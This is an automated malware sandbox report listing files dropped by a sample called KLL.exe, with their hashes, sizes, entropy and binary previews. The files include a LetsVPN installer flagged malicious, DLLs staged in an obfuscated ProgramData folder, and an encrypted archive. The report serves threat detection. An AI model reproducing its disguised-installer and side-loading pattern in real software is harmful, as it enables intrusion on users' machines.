Preview:	.wp.0.(...'..U!.[."1$D'./d %.=LE.C.X.g.V.t.......4.>.U.....e.mM~5..W.:....&p._.R.T..v..v...bM..b.;..!.P.m.?..\|kU...zdU...h..........].)..z;.^L.n^..5rP...c.....j..Z..3Z..7.O.8s.......'".A.....N..Q6.G.ww...f.....w...D...{....j,..L..S.r#.... ..}...p.m.g}...ma5.F.S$e.um...u&....2Z..y...1v(x3..b..^t3s.^xU......J...O.%26RayV...7^W..al...U...(.s<m....B.....c..E....1......=...i9.y.+.R.lA.._#`..{.!....!8`.%.,..5g.0..z...k...+\;_......`..5.C~.Q.m#($r...G.+......?FO....\.L..s..)...Z....@.<......f..?..T".4.....jb.2....H..#..I.=..w..f...W>..,.........M,...@\....p;Cw.w...{Y....(......V.......K\|...(......K..d..V.?4.E.....j.....C....Jt....Z.R....v#......\s7.... ......{...>....+.....{F`...qY.3...j.J..b:... ....Xf..w.........n.=.YA.}.5..,...j..V...".E"i...ga....&ay....`..,/'{ .$..\.l.~i.b.H..Zra..[......i..OQ..n..0..j.R+V..m..e..S.8.an.G...y..,../....$........ZE\.24xo..j......_!l.......c;....xw5.;I.I..X^3....w-.dU<.WP.e<.MC.tn.s.......b.V2...f.k-a.?...

C:\ProgramData\SQBg9\KQ3ts~m8\a

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	data
Category:	dropped
Size (bytes):	1399296
Entropy (8bit):	6.56865238701383
Encrypted:	false
SSDEEP:	24576:NYHcEsHv1dwkFXu0RmyM8gcPKkHPzHGgpfpT5/e7qJ5pv:O8EsHv1dL//e7qJ5pv
MD5:	6B42AFD6E161EE8C54CDFB11B5AF9FFB
SHA1:	2E781314CE1D547E9E4B8BC081B09FDC2BC2E3EE
SHA-256:	1CC454D14CA5A589B30E609A3B9D092F157D0AFFD0A50FC381FC6211809710AC
SHA-512:	F3B3A236440122FD94D4832C0BFB3136F92E36C945E4F2E886D04ACA995420DE3E8DDC26CDA06E0A7E637205FE09B1BF4CDF77F7500D16FBDBC738A4AD3E381C
Malicious:	false
Preview:	M..U.u..E......C.+C..+.....P.C.+..+.....PS...5.._^..[..]...U..E.........E.........E........]....h....U..QQ.E..E..S+..]..E.....x...V..W.].......u..+.U........+.+.]..E.....+E..C..E...K..C..C..E..K......s._.s .C$.E.^.K..C(.K,[..]...j... ........e...$u...}.e...A.j.j.P..,1..P.M..M....u..u..u...\1...M.}..........@......U....../&.3.E.V.E.3.P.q .u.u..u.u....7..j.V.E.P..,5...E...^;E....U..M.;.}.;E.~..E....M..E..]..E..E..]..e.E.+E..E..E..]..u.M.3.......]...SW...w ..$7..P.m......t.V.w ...Gm..V...Qh.....s ..p6..^_[.U...,../&.3.E.SV..3.CW......;...r...............;.......3.9.................W...u*.....C4;.....t.G......;.....\|...................C<..S@...E.E...%t7...t....t....u+.CD.+......{D...KD...CD.+.......+{D.S@..+KD;M.u.;...N...WQ...............}.(..3....v ..$7..P.;...Ph...../.....YY..........X................._o....X............T....A.}.%.......}.&v..}.(............H;........G.....~..G.P.......<).....T.v ..$7..P....Ph.........YY....u............h...........n.......

C:\ProgramData\SQBg9\KQ3ts~m8\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439608
Entropy (8bit):	6.652249319015373
Encrypted:	false
SSDEEP:	12288:oAoA7hbarg71r4RzfxjJhUgiW6QR7t5s03Ooc8dHkC2esq0Ju:oAoAN3r0Bm03Ooc8dHkC2eT0Ju
MD5:	1D8C79F293CA86E8857149FB4EFE4452
SHA1:	7474E7A5CB9C79C4B99FDF9FB50EF3011BEF7E8F
SHA-256:	C09B126E7D4C1E6EFB3FFCDA2358252CE37383572C78E56CA97497A7F7C793E4
SHA-512:	83C4D842D4B07BA5CEC559B6CD1C22AB8201941A667E7B173C405D2FC8862F7E5D9703E14BD7A1BABD75165C30E1A2C95F9D1648F318340EA5E2B145D54919B1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.C.4...4...4..t.I..4...L...4..Lm...4...4...4..Lm...4..Lm...4..Lm...4..Lm...4..Lm...4..Lm}..4..Lm...4..Rich.4..........................PE..L.....U.........."!................ ........ ...........................................@A.........................A.......R..,....................v..8?.......:..0g..8............................)..@............P......P>..@....................text..."........................... ..`.data....'... ......................@....idata..2....P......................@..@.didat..4....p.......4..............@....rsrc................6..............@..@.reloc...:.......<...:..............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\SQBg9\KQ3ts~m8\s

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1399296
Entropy (8bit):	6.567433402650088
Encrypted:	false
SSDEEP:	24576:odxGJLTlwL/kWX4VxKZ+8vFT8PmO1qYP2tD8kJOaA7VKLGucdsSgg43/u:Cy2L/kje8OFJG+yk87AGuWl4vu
MD5:	7592B1B592DBEC1FCE9E1358ED7E9BDA
SHA1:	0D8A5A8647D8064D54430AE0167DAE7539960A10
SHA-256:	23987FC9BB6C34592C729A05528524A2D875F852AB62558FD80588075A5EA170
SHA-512:	12AB7F58EE31CDFFC03F5C69E87C3C52C520884C76184116F88FEEB3A29E3406B25E30F6BB64C8F3853549F92442009540FC62A35EE66660BF039664F0AB9455
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,.K.M...M...M..5....M..5...$M..5....M...5d..M...5c..M...5s..M...M..~O..,....M..,....M..,....L..4....M..4....M..4....M...Mw..M..4....M..Rich.M..........PE..L....C.f...........!.........F......\........0................................,...........@...........................#.....L.%.@......H1...................@.d\|...C!.8...................tD!......D!.@............0..P............................text............................... ..`.rdata.......0......."..............@..@.data........ &..T....&.............@....gfids..h....0(......^&.............@..@.giats........).......(.............@..@.tls..........).......(.............@....rsrc...H1......2....(.............@..@.reloc..d\|...@..~...6(.............@..B........................................................................................................................................................

C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	99904
Entropy (8bit):	6.435962118124312
Encrypted:	false
SSDEEP:	1536:xvQ8DfZL6Gp/N6EZZtS/PG4/L1VOKFcbXWIJJffAgv:xvQ8DZ2vEZZtS3FxVRiGCfhv
MD5:	8AA07B7C6C632F4EDF07A0E2B91F8566
SHA1:	2E72D725A845B532C19A422FB32DEB629F53C824
SHA-256:	DD8BFBB25430E7F19E24234494324264BE98AC0CC20B239E18B4DD35E26EC1BC
SHA-512:	A9B3EB0B0EAFC53ACE21E30C12CCB64B9FC152CDF52A4A2C0B395DC6F9D20181B3006DCE14A16226DF9010A68673BB71656D8A95AC0597A12D05C99D15E3F909
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+..E+..E+..E8.D)..E8.D'..Ej..D)..E8.D/..E8.D5..E"..E2..E+..E...Ej..D..Ej..D,..Ej.sE..E+..E..Ej..D..ERich+..E........................PE..L....)a[..........................................@.................................].....@.................................h...,.... ..H_...........r..@...............p........................... ...@...............T............................text.............................. ..`.rdata...n.......p..................@..@.data...............................@....rsrc...H_... ...`..................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2798592
Entropy (8bit):	6.785357408096823
Encrypted:	false
SSDEEP:	49152:Cy2L/kje8OFJG+yk87AGuWl4vZ8EsHv1dL//e7qJ5pv:92jkje8KM+ykyAGuWl4h5sHv1N/
MD5:	222FC00C04823BAAEF6EA2406082DB6E
SHA1:	B4042DAFBD8DED61C64C8ED69B8DC06710950A01
SHA-256:	90BA55338412BFF084A981F67DA7FF07333C339C1965CFA23832442532247C50
SHA-512:	65C99E567C9BE76C94553DE46DE5F7B6C079630921A063897DC8C4EA0D7C2EC34634A2004F5C10135AD18A38BDB35E92CF3161638B3855E2C9D2216B3EE74877
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,.K.M...M...M..5....M..5...$M..5....M...5d..M...5c..M...5s..M...M..~O..,....M..,....M..,....L..4....M..4....M..4....M...Mw..M..4....M..Rich.M..........PE..L....C.f...........!.........F......\........0................................,...........@...........................#.....L.%.@......H1...................@.d\|...C!.8...................tD!......D!.@............0..P............................text............................... ..`.rdata.......0......."..............@..@.data........ &..T....&.............@....gfids..h....0(......^&.............@..@.giats........).......(.............@..@.tls..........).......(.............@....rsrc...H1......2....(.............@..@.reloc..d\|...@..~...6(.............@..B........................................................................................................................................................

C:\ProgramData\SQBg9\KQ3ts~m8\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85328
Entropy (8bit):	6.8770791315221285
Encrypted:	false
SSDEEP:	1536:BTXU4YQD+JZoxeu8zIrBj3hGzHRb3izsQe1o8jsu0gD/TecbOjc8WsaBmiK:pXUlQDeexZTBozHRb3izsQe1o8E8ecbg
MD5:	B77EEAEAF5F8493189B89852F3A7A712
SHA1:	C40CF51C2EADB070A570B969B0525DC3FB684339
SHA-256:	B7C13F8519340257BA6AE3129AFCE961F137E394DDE3E4E41971B9F912355F5E
SHA-512:	A09A1B60C9605969A30F99D3F6215D4BF923759B4057BA0A5375559234F17D47555A84268E340FFC9AD07E03D11F40DD1F3FB5DA108D11EB7F7933B7D87F2DE3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^$Y..E7W.E7W.E7W..W.E7W.=.W.E7W.E6W3E7W..3V.E7W..4V.E7W..2V.E7W..?V.E7W..7V.E7W...W.E7W..5V.E7WRich.E7W........................PE..L.....U.........."!......... ...............................................P......r.....@A........................`................0..................P?...@....... ..8...........................X ..@............................................text...t........................... ..`.data...............................@....idata..............................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................

C:\ProgramData\ckq

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	15276447
Entropy (8bit):	7.998753884111449
Encrypted:	true
SSDEEP:	393216:8JJ1AboWROo2Q3d2sMNJ+Hmasukzz34qx4:8JJ1AtROo1YsM6Hmad+oH
MD5:	9437D784A2E279B14A4DC3CF259476FA
SHA1:	EC9664C8EF8750024002FD26E965BC003908D546
SHA-256:	885043FA2833789BE359A5C012076BC83F509DD4E70CA237A61B9C767ABB15D4
SHA-512:	97DBEE4E312921BF603BE17315E5DB6072FB460F70DFA464F54EB9543A39CED7FC7797B8B798ABEF579EF575610607FE908982AC983DA1AD3BB16B037BEA176D
Malicious:	false
Preview:	PK.........Y.X6L<.....(.......letsvpn-latest.exe.}xT.7..+.$.f.........h..8D'$.>..Cf@..!.d..&{#.D.w.l7......9........E<...%.Q.G!.....q...a.....g..s.<....^..^'...^..Z.^....Z;.{.0.c..i..d.........].........iX...KC..y.M..6..[U.n]...@]^....~]^.._...u333...0~}..-...M...+>.............f............BT.....fl....~.pO2m.......B.y#cV.)D...5.:>R.x...._..i...^..=......c/R.1.u....z.c........U.?.).m..)..P..A.?y..?.iu.P....c..a.......z1.........*.5s].`...k.G].....q.............W~..Aip..b....]....LiA.C.T+.....D.&.4..L~.......J.y.G./..<+.YR.y&.m..Y=-.iJ.T7.)+ZQ.(...n.....J......W.M{d..G...O.!..I.....W<..[9...XJ5..E.....a.......]....y..k9....2..l.....3....l..V..-.}...I...:m.l-g)jut..P....@..,....j%..E.m........R..#..N....7....,Cj......].IGI;..[Y.u.=..,.7o....)G\|.Gs...P....{.......h....)o....H...X....i~...n....^.q@.9...b..N._..........Ch:x..{..i....j+....a.W.P......d..P.TX....b.MH..5O..:sx'.=.]...s..y..N.H...V..l.Y.>...L.{d.. X...%........t...+.ZF.pNj.3!

C:\ProgramData\letsvpn-latest.exe

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	15382056
Entropy (8bit):	7.99696244933667
Encrypted:	true
SSDEEP:	196608:Lz/DARUOMn1C69maJR/v/IMUMeaxI7cXRFhGaJ26TpB+cKdFy65Fo+uLEeBYk5rW:HDp/9mEvZUMecIUGaJfOdFy65UDKZR
MD5:	7CE62DC191CEE9DD1488C9D0A25FEDA4
SHA1:	6A93A38644691389622E1C5CDD3BAF3CA429D0C1
SHA-256:	6342D9126585047B6ECE614946B139FF3CC98ACA024CE368FADCEE1DDFE0D88E
SHA-512:	1FAC206D9D52CC1054283948119F6C830367724F46BF4572F843855BEEE7E4CAA0BC17FEC09E725404E5880DCE15742BC5E40A6EC8CC21A2D6799232BA7D293D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h...........3............@..........................@...........@..........................................p..............@....+...........................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata... ...P...........................rsrc........p......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\tor.dat

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	3.753434386188785
Encrypted:	false
SSDEEP:	3:8VEoc2RDIXIcXWT8Y:8Vu2DqIcGwY
MD5:	DC154BEE3360706599B4C4BE5C6FC78B
SHA1:	7D57B5796333C73D737FA2E63B9B31CB360115AE
SHA-256:	9DF261AB17C6724F31CB6E39DC47F901DA156AB19E4A45E33C6E3E64B40EEB26
SHA-512:	EBFADFFA73E2A80499B2DD3387A61E0289DE938F1BEB23E45695185AE00F49B48BA95323A69DB46F1C5C4052F09528DCE96D9BC9C2EB10D213BD00BECB4C8931
Malicious:	false
Preview:	tLa0utG2t9G0tsa1tryztry2s6Y=

C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_0oczbjylb1galocprl35cp3mvj2urvw0\AppCenter.config (copy)

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	199
Entropy (8bit):	5.098228367299567
Encrypted:	false
SSDEEP:	3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqPHQUiAccuqUUFKaF9ULVuup:TMVBd1IGpOSAMBluq/QP33cfG3QIT
MD5:	0791A04595CD0FD6FD64E14E98EE60C6
SHA1:	EEDA05354797D68BC77A20DA0407361EDB9AC097
SHA-256:	1F3ABEFF1391C42DB3E907D7F6199762C59BAB53D70F8495B9444195E38D5303
SHA-512:	74FF84073A75193AEBF25E1057BDCF7AF02B95236D4182F261385237C61DB9957BD0A4F9CB08244A901FA382A29DCDE3709E34F57EB4E9D76E14E074DB0C6350
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="c81b8711-ae26-4726-9ec7-ea291d5b0441" />.. </appSettings>..</configuration>

C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_0oczbjylb1galocprl35cp3mvj2urvw0\m3f25iur.newcfg

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	199
Entropy (8bit):	5.098228367299567
Encrypted:	false
SSDEEP:	3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqPHQUiAccuqUUFKaF9ULVuup:TMVBd1IGpOSAMBluq/QP33cfG3QIT
MD5:	0791A04595CD0FD6FD64E14E98EE60C6
SHA1:	EEDA05354797D68BC77A20DA0407361EDB9AC097
SHA-256:	1F3ABEFF1391C42DB3E907D7F6199762C59BAB53D70F8495B9444195E38D5303
SHA-512:	74FF84073A75193AEBF25E1057BDCF7AF02B95236D4182F261385237C61DB9957BD0A4F9CB08244A901FA382A29DCDE3709E34F57EB4E9D76E14E074DB0C6350
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="c81b8711-ae26-4726-9ec7-ea291d5b0441" />.. </appSettings>..</configuration>

C:\Users\user\AppData\Local\Microsoft\AppCenter\c81b8711-ae26-4726-9ec7-ea291d5b0441\Logs.db

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3031001, file counter 9, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	2.031159633531635
Encrypted:	false
SSDEEP:	96:ih0mbxJWMCzf98BsJMqxJv8ExJnCzf98BBXExJnCzf98BY:i+MWMCzf98BbqvBnCzf98BNUnCzf98BY
MD5:	C30618612EE68C38A61465CA75179136
SHA1:	0CE29B1C7C558B913D6E5B948D2F5DFD4CA25DBB
SHA-256:	9C28A8831760D25F586925232B4E9ADA0E4B7247648D14393DC9879F11EB5FE3
SHA-512:	C9DF690C9F66D0E32BEBA886A12AEDF7467ACDFAE9B47C803639A5E71C86F9130D4F6A65DA2CDBC9858D8B8B8D32A43857579023B6EA3F2518DA2C04C8BCB6FE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................?.........\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\AppCenter\c81b8711-ae26-4726-9ec7-ea291d5b0441\Logs.db-journal

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	SQLite Rollback Journal
Category:	modified
Size (bytes):	12824
Entropy (8bit):	1.985892919919115
Encrypted:	false
SSDEEP:	192:7mWMCzf98BbqvCzf98BnICzMUnCzf98Bg6:7PfFaF4MbF16
MD5:	37FA7523EA3E550FDA7633BEE9CE3E3D
SHA1:	B2E95E08D0994BC7270758EC741DA71C5104E0E2
SHA-256:	5870FF7EBD5A5AE4A116AA3F065633F8A0D1AF4C936B71B145B5A555581785D4
SHA-512:	8E2530B12BC3C1C42A441F252C69DD63AC9B875B580DB0C25484940E81385938C606F74087CA3D74478CAEA137A3F9E9FFBBF5A2E95909EAC6C5F644069D1DE1
Malicious:	false
Preview:	.... .c.......=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LetsPRO.exe.log

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	5.348163999675204
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeYHKU57UjHKtHKMRtHj:iqlYqh3ou0aymsqwtI6eqzVqU57Ujqtp
MD5:	1D015055F59E3C59A292A836E94902DB
SHA1:	6606627C577A8D9FBB362C0FFFD5E500295CA4AC
SHA-256:	D72DA6BAE429BF4A293DF3A8B637CC821491A9585DEA47553D6753A50D6EE519
SHA-512:	C2484FDCB22662B80659A9BD978CB1995D1C7912E6E24AABCF917862DB74F900B4775A24EE922B7A9B41CA48B5EF82C2E13C951D2CAD716B86FA11E1687C2EFA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.363556437014245
Encrypted:	false
SSDEEP:	48:RWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:RLHxvIIwLgZ2KRHWLOugQs
MD5:	C3F3DB13776A4E32A6E3079C5E478FA5
SHA1:	858689376F97C94AD7C2CEDE7F767E1A5F16632B
SHA-256:	9CBEEEF796BD3B8C2EB362B9348B54E46F0462A24431CAC3BCC613F94C146DCC
SHA-512:	4AA6A5A8D4E377CF2855ED43A33F313FD3CCA529C843A5A71C5D2B179FB448BD42A78A8A1E32BF5D8097F2FE89333B9F8E8EF8F1AAC4BF77AE98ABFC6165104E
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u0lvmky.01w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apkthrpq.bv5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gp4y1i2i.4ju.ps1

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4bplbaa.rd0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_if4yqzjp.53w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljutrfvq.rwz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi3ahnz2.mwr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkmbxis4.asn.psm1

Download File

Process:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

